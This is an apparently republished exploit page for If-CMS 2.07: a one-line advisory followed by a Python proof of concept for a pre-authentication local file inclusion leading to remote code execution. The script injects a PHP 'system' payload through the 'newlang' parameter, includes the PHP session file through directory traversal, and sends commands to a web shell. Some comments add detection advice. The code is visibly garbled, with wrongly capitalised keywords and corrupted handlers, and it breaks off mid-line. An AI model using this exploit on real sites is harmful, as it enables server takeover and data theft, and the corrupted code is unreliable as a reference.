If-CMS is a free and open-source content management system. If-CMS has a local file inclusion (LFI) vulnerability that can lead to sensitive information disclosure.
[+] Info:
~~~~~~~~~
If-CMS 2.07 Pre-Auth Local File Inclusion 0day Exploit
[+] Poc:
~~~~~~~~~
#! /Usr/bin/python
#~ INFORMATION
# Exploit Title: If-CMS 2.07 Pre-Auth Local File transfer sion 0day Exploit
# Author: TecR0c
# Date: 13/3/2011
# Software link: http://bit.ly/hh9ZB4
# Tested on: Linux bt
# Version: 2.07
# PHP. ini Settings: gpc_magic_quotes = Off
Import random, time, sys, urllib, urllib2, re, httplib, socket, base64, OS, getpass
From optparse import OptionParser
From urlparse import urlparse, urljoin
From urllib import urlopen
From cookielib import CookieJar
# Script metadata; both values are interpolated into the banner printed by banner().
_ CONTACT _ = "TecR0c (tecr0c@tecninja.net )"
_ DATE _ = "13.3.2011"
# Usage text: the only positional argument is the base URL of the If-CMS install;
# -p / --proxy optionally routes every request through an HTTP proxy.
Usage = Example: % s http: // localhost/ncms/-p 127.0.0.1: 8080% _ file __
Parser = OptionParser (usage = usage)
Parser. add_option ("-p", "-- proxy", type = "string", action = "store", dest = "proxy ",
Help = "HTTP Proxy <server >:< port> ")
(Options, args) = parser. parse_args ()
If options. proxy:
Print [+] Using Proxy + options. proxy
# User Agents
# One entry is picked at random per run (see `Agent` below), so a single fixed
# User-Agent string is not a reliable detection signature for this tool; the
# `newlang` parameter contents are the better signal.
Agents = ["Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0 )",
"Internet Explorer 7 (Windows Vista); Mozilla/4.0 ",
"Google Chrome 0.2.149.29 (Windows XP )",
"Operators' 9.25 (Windows Vista )",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1 )",
"Opera/8.00 (Windows NT 5.1; U; en)"]
Agent = random. choice (agents)
# Directory-traversal prefix and PHP session directory; both are concatenated into
# the vulnerable `newlang` parameter by writeOutShell() to reach a session file
# through the include sink. Depth of the traversal is a guess that only needs to be
# "deep enough" to reach the filesystem root.
Traversal = ../../../../../../../../../../../..
# NOTE(review): /var/lib/php5/ is the Debian-family default session.save_path for
# PHP 5; other distributions and PHP versions store session files elsewhere, which is
# one reason this proof of concept is environment-specific.
SessionLocation =/var/lib/php5/
# Clears the terminal and prints the banner one character at a time.
# Purely cosmetic: no network activity happens here.
Def banner ():
If OS. name = "posix ":
OS. system ("clear ")
Else:
OS. system ("cls ")
Header =
| ---------------------------------------- |
| Exploit: If-CMS 2.07 LFI RCE
| Author: % s
| Date: % s
| ---------------------------------------- |
% (_ CONTACT __,__ DATE __)
# Character-by-character print with a 5 ms pause per character, flushing stdout
# each time so the "typing" effect is visible.
For I in header:
Print "% s" % I,
Sys. stdout. flush ()
Time. sleep (0.005)
# Sends a PHP code fragment as the value of the `newlang` query parameter of index.php.
# This request executes nothing by itself; the page's exploit flow relies on the value
# being persisted server-side (presumably in the PHP session file, since writeOutShell()
# later includes that file by the PHPSESSID captured in the cookie jar).
# Defensive note: a language/locale selector must be validated against a fixed allowlist
# of language codes and must never be used to build a filesystem path or be stored into
# session data verbatim. A `newlang` value containing `<?php`, `system(`, or traversal
# sequences is an unambiguous detection signal for this technique in web server logs.
# NOTE(review): `url` is not defined anywhere in the visible portion of the script;
# presumably it is parsed from args[0] in a part not shown.
Def injectPayload ():
WebSiteUrl = url. geturl () + index. php? Newlang = <? Php; system (base64_decode ($ _ REQUEST [cmd]);?>
Try:
Opener. open (webSiteUrl)
# A failed request is only reported; the script continues regardless.
Except t:
Print [-] Failed
# Verifies that the optional proxy accepts a TCP connection before any further traffic
# is sent. Every failure path (timeout, missing option, any other error) prints a
# message and exits with status 1; with no -p given the function does nothing.
# NOTE(review): the connection opened with H2.connect() is never closed; it is simply
# dropped when the function returns.
Def proxyCheck ():
If options. proxy:
Try:
H2 = httplib. HTTPConnection (options. proxy)
H2.connect ()
Print "[+] Using Proxy Server:", options. proxy
Handle T (socket. timeout ):
Print "[-] Proxy Timed Out"
# `pass` before sys.exit is a no-op; the exit is what ends the run.
Pass
Sys. exit (1)
Failed T (NameError ):
Print "[-] Proxy Not Given"
Pass
Sys. exit (1)
Except t:
Print "[-] Proxy Failed"
Pass
Sys. exit (1)
# Builds a urllib2 ProxyHandler that routes HTTP requests through options.proxy and
# returns it for use in build_opener().
# NOTE(review): constructing a ProxyHandler performs no network I/O, so the
# socket.timeout handler below is unlikely ever to fire; proxyCheck() is the actual
# reachability test.
Def getProxy ():
Try:
Proxy_handler = urllib2.ProxyHandler ({http: options. proxy })
Handle T (socket. timeout ):
Print "[-] Proxy Timed Out"
Sys. exit (1)
Return proxy_handler
# Shared cookie jar. The PHPSESSID cookie it captures from the first response is what
# writeOutShell() later reads back to derive the session file name, which is why the
# same jar must be attached to every request.
Cj = CookieJar ()
# One opener (with or without the proxy handler) is built once and reused globally.
If options. proxy:
Opener = urllib2.build _ opener (getProxy (), urllib2.HTTPCookieProcessor (cj ))
Else:
Opener = urllib2.build _ opener (urllib2.HTTPCookieProcessor (cj ))
# Header tuple is (name, value); the value is the randomly chosen User-Agent from above.
Opener. addheaders = [(User-agent, agent)]
# POSTs a base64-encoded command as the `cmd` form field to a shell.php path appended to
# the site URL and returns the raw response body. Any request error prints a message and
# exits; note this exit carries status 0, unlike proxyCheck()'s exit(1).
# Defensive note: a newly appearing .php file under the document root that receives
# POSTs with a base64-looking `cmd` field is the post-exploitation signature to alert
# on; file-integrity monitoring of the web root detects the dropped file itself, and a
# read-only document root prevents it being written in the first place.
Def postRequestWebShell (encodedCommand ):
WebSiteUrl = url. geturl () +. shell. php
CommandToExecute = [
(Cmd, encodedCommand)]
Export data = urllib. urlencode (commandToExecute)
Try:
Response = opener. open (webSiteUrl, response data). read ()
Except t:
Print [-] Failed
Sys. exit ()
Return response
Def writeOutShell (encodedCommand ):
CookieString = str (cj)
CookieSearch = re. compile (r "PHPSESSID = (. *) f ")
Session_value = cookieSearch. search (cookieString)
If session_value:
Session_value = session_value.group (1)
Cj. clear ()
WebSiteUrl = url. geturl () + index. php? Cmd = + encodedCommand + & newlang = + traversal + sessionLocation + sess _ + session_value + % 00
Try:
& Nb